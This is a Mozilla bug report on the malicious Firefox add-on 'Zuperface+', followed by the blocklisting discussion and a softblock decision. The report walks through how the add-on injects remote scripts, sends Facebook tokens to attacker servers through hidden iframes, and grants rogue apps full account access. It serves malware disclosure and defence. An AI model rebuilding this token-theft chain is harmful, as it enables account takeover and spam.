Last Comment Bug 729356 - Malicious "Zuperface+" add-on
: Malicious "Zuperface+" add-on
Status: RESOLVED FIXED
[Read comment #6 before posting!]
:
Product: Toolkit
Classification: Components
Component: Blocklisting (show other bugs)
: unspecified
: All All
: -- normal (vote)
: ---
Assigned To: Jorge Villalobos [:jorgev]
:
: Jorge Villalobos [:jorgev]
Mentors:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2012-02-21 16:20 PST by MarkH
Modified: 2016-03-07 15:30 PST (History)
4 users (show)
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
20120221 zuperface.zip (562.71 KB, application/octet-stream)
2012-02-21 16:20 PST, MarkH
no flags Details

Description MarkH 2012-02-21 16:20:55 PST
Created attachment 599404 [details]
20120221 zuperface.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11

Steps to reproduce:

Downloaded the extension from http://www.zuperface.com/firefox.html


Actual results:

addon loads loads adobeflashplayer.js

adobeflashplayer.js:

sets/reads state from local storage
sets up debugging options
if it's on a facebook domain, it injects http://speed.zuperface.com/zuperface.js
if it's on a google domain, it injects
http://speed.zuperface.com/g.js

zuperface.js:

Grabs your basic details via http://graph.facebook.com/<uid>&callback=cins

Injects http://speed.zuperface.com/offline.js if it's turned off, otherwise injects 
http://speed.zuperface.com/zaza.js; both injects pass your UID to their server as GET params

Calls http://super.zuperface.com/reklam.html, which loads an image tag to http://whos.amung.us/widget/ksuw9d7f54el.png


zaja.js (several versions of this, based on the value of the 'cins' GET param):

cins=3
Injects a hidden iframe to http://speed.zuperface.com/letsgo.html? which includes your FB tokens for posting as GET params
Make a POST to http://www.facebook.com/ajax/follow/manage_subscriptions.php, to subscribe to FB user 1520948160

cins=1
Injects a hidden iframe of http://speed.zuperface.com/tokmak.php? which includes your FB open graph token, UID, sex, and an FB application ID as GET params


letsgo.html:

has the following FB app IDs: ['6802152230','176901472156','291549705119','5085647995'];

Creates an iframe for each app ID to http://173.244.196.29/~zuperfac/speed/sol.html? which includes your FB tokens for posting as GET params


sol.html:

Posts to http://www.facebook.com/connect/uiserver.php to give the passed in app ID full permissions to your Facebook account.


Password on the attached zip is 'infected'



Expected results:

It should not steal your Facebook user information/tokens; it should not give FB applications full access to your Facebook account without your consent.
Comment 1 Jorge Villalobos [:jorgev] 2012-02-22 09:44:30 PST
This looks like a very elaborate Facebook customization add-on. I tested for a while and didn't see any bad behavior, like pages or apps suddenly added to my account. Even if it did that, it's insufficient for blocklisting.

Any privacy concerns should be voiced to the developers of this add-on, so they can fix them.
Comment 2 MarkH 2012-02-22 09:55:47 PST
Jorge,

You won't see any visible bad behavior easily with this one, aside from a new person your Facebook account is subscribed to.  The only other evidence you'll see in an account is four new FB apps installed.  The problem, however, is that the four FB apps it installs are given full permissions to your account.  That means they can post as you, from their own servers, whenever they want.  As a result, we see significant amounts of spam coming from the bad actor's infrastructure, using the compromised accounts.
Comment 3 Jorge Villalobos [:jorgev] 2012-02-22 10:07:53 PST
The add-on itself is not malicious in nature, compromising users' security or causing major stability problems. This doesn't qualify for blocklisting.
Comment 4 MarkH 2012-02-22 10:40:07 PST
Jorge, 

The add-on downloads malicious JS to get full access to a person's facebook account.  That means their email address, their name, their phone number, the ability to post messages as them, to remove content as them, ...

This one is more malicious than the other add-ons that were blocked in the past.
Comment 5 Jorge Villalobos [:jorgev] 2012-02-22 13:55:10 PST
I disagree. The other add-ons you have posted have the intent to deceive users and take advantage from them. They use shady temporary domains, change their code ever so slightly and distribute over and over. 

This add-on looks like it has been worked on significantly, and it is actually meant to benefit users. It has the potential to access user information, but so can any add-on. Unless it is actively stealing info and you have evidence of this, I'll err on the side of caution and not blocklist an add-on that looks legitimate.
Comment 6 Jorge Villalobos [:jorgev] 2012-02-22 16:38:44 PST
We have been given additional information about Zuperface+. It is adding apps to the Facebook accounts of its users, with full access permissions, without their consent. These apps generate spam posts. They are being disabled by Facebook, but the add-on gets new app ids dynamically, indicating malicious intent.

To users of Zuperface+: while this add-on can be useful, it is using your accounts for spamming purposes. We can't allow this, so we have decided to block Zuperface+, at least until they correct their behavior.
Comment 7 Jorge Villalobos [:jorgev] 2012-02-22 16:42:04 PST
Softblock put in place: https://addons.mozilla.org/en-US/firefox/blocked/i69

Note You need to log in before you can comment on or make changes to this bug.